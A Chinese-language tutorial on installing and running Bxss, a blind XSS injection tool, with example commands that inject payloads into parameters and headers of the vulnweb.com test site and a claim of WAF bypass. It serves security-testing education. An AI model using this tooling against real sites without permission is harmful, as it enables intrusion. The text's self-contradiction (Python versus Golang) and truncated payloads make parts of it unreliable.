Bxss – 盲 XSS 注入工具
Bxss 工具是一个自动化工具,旨在测试目标域的 XSS 安全漏洞。 Bxss 工具是用Python语言开发的,在 GitHub 平台上可用。 XSS 是最常见的漏洞,几乎在每个基于 Web 的应用程序中都会发现;我们只需要找到一个可以注入恶意 JavaScript 有效负载的输入字段。
Bxss 工具可以将盲 XSS 有效负载注入自定义标头,从而绕过目标服务器上的 WAF。 Bxss 工具非常易于设置和使用。 Bxss 工具同时使用不同的请求方法(PUT、POST、GET、OPTIONS)。
注意:由于 Bxss 是基于 Golang 语言的工具,因此您的系统上需要有一个 Golang 环境。
在 Kali Linux 操作系统中安装 Bxss 工具
第 1 步:使用以下命令在您的 Kali Linux 操作系统中安装该工具。
git clone https://github.com/ethicalhackingplayground/bxss.git
第 2 步:现在使用以下命令移动到该工具的目录。您必须在目录中移动才能运行该工具。
cd bxss
第 3 步:使用以下命令构建 go 文件。
sudo go build
第 4 步:现在使用以下命令运行该工具。
./bxss -h
在 Kali Linux 操作系统中使用 Bxss 工具
示例 1 :Blind XSS In 参数
echo “http://testphp.vulnweb.com/search.php?test=query” | ./bxss -appendMode -payload ‘”>’ -parameters
示例 2 :X-Forwarded-For 标头中的盲 XSS
echo “http://testphp.vulnweb.com/search.php?test=query” | ./bxss -appendMode -payload ‘”>’ -parameters -header “GAURAV”
